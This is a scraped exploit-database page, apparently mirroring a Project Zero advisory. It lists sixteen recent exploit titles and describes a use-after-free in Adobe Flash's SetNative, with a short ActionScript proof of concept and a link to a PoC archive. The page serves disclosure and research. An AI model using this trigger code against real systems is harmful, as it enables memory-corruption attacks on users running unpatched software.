6dc4d46521
16 new exploits Meteocontrol WEB’log - Admin Password Disclosure Cisco ASA Software 8.x / 9.x - IKEv1 and IKEv2 Buffer Overflow Adobe Flash - JXR Processing Out-of-Bounds Read Adobe Flash - Out-of-Bounds Read when Placing Object Adobe Flash - Overflow in Processing Raw 565 Textures Adobe Flash - Heap Overflow in ATF Processing (Image Reading) Adobe Flash - MP4 File Stack Corruption Adobe Flash - Type Confusion in FileReference Constructor Adobe Flash - addProperty Use-After-Free Adobe Flash - SetNative Use-After-Free Windows - gdi32.dll Multiple Issues in the EMF CREATECOLORSPACEW Record Handling (MS16-055) Windows - gdi32.dll Multiple Issues in the EMF COMMENT_MULTIFORMATS Record Handling (MS16-055) Windows - gdi32.dll Heap-Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055) Symantec/Norton Antivirus - ASPack Remote Heap/Pool Memory Corruption Vulnerability Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection SAP xMII 15.0 - Directory Traversal
21 lines
597 B
Text
Executable file
21 lines
597 B
Text
Executable file
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=800
|
|
|
|
There is a use-after-free in SetNative. If a watch is placed on a native that is initialized by SetNative, it can delete the object the set is being called on, leading to a use-after-free. A minimal PoC follows:
|
|
|
|
var t = this.createEmptyMovieClip("t", 1);
|
|
t.watch("a", func);
|
|
ASSetNative(t, 106, "a,b");
|
|
|
|
|
|
function func (){
|
|
|
|
t.removeMovieClip();
|
|
|
|
}
|
|
|
|
A swf and fla are attached.
|
|
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39831.zip
|
|
|